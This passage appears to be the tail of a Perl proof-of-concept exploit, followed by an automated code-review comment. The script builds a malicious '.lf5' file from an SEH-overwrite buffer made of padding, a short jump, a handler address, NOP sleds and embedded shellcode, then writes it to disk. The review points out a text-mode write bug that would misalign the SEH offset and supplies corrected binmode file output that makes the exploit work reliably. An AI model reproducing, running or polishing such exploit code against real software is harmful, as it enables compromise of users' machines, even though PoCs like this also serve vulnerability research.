"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b".
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e".
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c".
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x65\x64".
"\x21\x01\x68\x20\x50\x77\x6e\x68\x20\x5a\x53\x4c\x89\xe1\xfe".
"\x49\x0b\x31\xc0\x51\x50\xff\xd7";
my $buffer = "A" x 43 . "\xEB\x06\x90\x90" . "\xB0\x5D\x40\x00" . "\x90" x 16 . $sc . "\x90" x 20 . "D" x 2627;
my $file = "Gaming Nerdz.lf5";
my $junk = $header.$buffer;
open($FILE,">$file");
print $FILE "$junk";
close($FILE);
print "Malicious LF5 file created successfully!\n";
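Review bot: `$header` carries a raw `\x0A` as its fifth byte, yet the file is written through `open($FILE,">$file")` in text mode; on the Windows 7 hosts the header says this was tested on, a Windows build of Perl would emit that byte as `\x0D\x0A`, shifting every following offset by one so the nSEH/handler pair at offset 43 no longer lines up. The open is also two-argument, unchecked and on a bareword handle, and the script lacks `use strict; use warnings;`. The SEH handler `\xB0\x5D\x40\x00` (0x00405DB0) is not annotated at all, unlike the sibling TECO PoC in this commit; it is presumably a pop/pop/ret in the main executable given the 0x0040xxxx range, and a comment naming the module and gadget plus its SafeSEH/ASLR status should be added above `my $buffer`. The rewritten I/O:

```perl
use strict;
use warnings;
# … unchanged: $header, $sc, $buffer, $file and $junk construction …
open(my $fh, '>', $file) or die "open $file: $!";
binmode($fh);    # header holds "\x0A"; text-mode CRLF translation would shift the SEH offset
print {$fh} $junk;
close($fh) or die "close $file: $!";
```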